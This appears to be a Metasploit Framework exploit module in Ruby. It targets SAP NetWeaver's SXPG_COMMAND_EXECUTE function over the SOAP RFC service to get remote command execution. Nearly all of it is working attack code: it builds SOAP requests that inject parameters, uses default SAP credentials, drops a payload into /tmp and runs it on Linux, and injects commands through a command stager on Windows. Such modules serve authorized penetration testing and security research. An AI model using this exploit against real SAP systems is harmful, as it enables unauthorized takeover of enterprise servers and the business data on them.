##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy.
#
# The following guys from ERP-SCAN deserve credit for their contributions -
# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
# Dmitry Evdokimov.
#
# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
# who have Beta tested the modules and provided excellent feedback. Some people
# just seem to enjoy hacking SAP :)
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution',
'Description' => %q{
This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP
SOAP RFC Service, to execute remote commands. This module needs SAP credentials with
privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested
successfully on Windows 2008 64 bits and Linux 64 bits platforms.
},
'References' =>
[
[ 'URL', 'http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection' ],
[ 'URL', 'https://service.sap.com/sap/support/notes/1764994' ],
[ 'URL', 'https://service.sap.com/sap/support/notes/1341333' ]
],
'DisclosureDate' => 'May 8 2012',
'Platform' => ['win', 'unix'],
'Targets' => [
[ 'Linux',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
#'Payload' =>
#{
#'DisableNops' => true,
#'Space' => 232,
#'Compat' =>
#{
#'PayloadType' => 'cmd',
#'RequiredCmd' => 'perl ruby',
#}
#}
}
],
[ 'Windows x64',
{
'Arch' => ARCH_X86_64,
'Platform' => 'win'
}
]
],
'DefaultTarget' => 0,
'Privileged' => false,
'Author' =>
[
'nmonkee'
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8000),
OptString.new('CLIENT', [true, 'SAP Client', '001']),
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('PASSWORD', [true, 'Password', '06071992'])
], self.class)
register_advanced_options(
[
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
], self.class)
end
def send_soap_request(data)
res = send_request_cgi({
'uri' => '/sap/bc/soap/rfc',
'method' => 'POST',
'data' => data,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
'ctype' => 'text/xml; charset=UTF-8',
'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
},
'vars_get' => {
'sap-client' => datastore['CLIENT'],
'sap-language' => 'EN'
}
})
return res
end
def build_soap_request(command, sap_command, sap_os)
data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\r\n"
data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n"
data << "<env:Body>\r\n"
data << "<n1:SXPG_COMMAND_EXECUTE xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n"
data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>\r\n"
data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>\r\n"
data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>\r\n"
data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>\r\n"
data << "</n1:SXPG_COMMAND_EXECUTE>\r\n"
data << "</env:Body>\r\n"
data << "</env:Envelope>"
return data
end
def check
data = rand_text_alphanumeric(4 + rand(4))
res = send_soap_request(data)
if res and res.code == 500 and res.body =~ /faultstring/
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
if target.name =~ /Windows/
linemax = datastore['PAYLOAD_SPLIT']
vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request")
execute_cmdstager({ :delay => 0.35, :linemax => linemax })
elsif target.name =~ /Linux/
file = rand_text_alphanumeric(5)
stage_one = create_unix_payload(1,file)
print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
res = send_soap_request(stage_one)
if res and res.code == 200 and res.body =~ /External program terminated/
print_good("#{rhost}:#{rport} - Payload dump was successful")
else
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
end
stage_two = create_unix_payload(2,file)
print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
send_soap_request(stage_two)
end
end
def create_unix_payload(stage, file)
command = ""
if target.name =~ /Linux/
if stage == 1
my_payload = payload.encoded.gsub(" ","\t")
my_payload.gsub!("&","&")
my_payload.gsub!("<","<")
command = "-o /tmp/" + file + " -n pwnie" + "\n!"
command << my_payload
command << "\n"
elsif stage == 2
command = "-ic /tmp/" + file
end
end
return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
end
def execute_command(cmd, opts)
command = cmd.gsub(/&/, "&")
command.gsub!(/%TEMP%\\/, "")
data = build_soap_request("&#{command}", "LIST_DB2DUMP", "Windows NT")
begin
res = send_soap_request(data)
if res and res.code == 200
return
else
if res and res.body =~ /faultstring/
error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
0.upto(error.length-1) do |i|
vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
end
end
print_status("#{res.code}\n#{res.body}")
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
end
rescue ::Rex::ConnectionError
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
end
end
end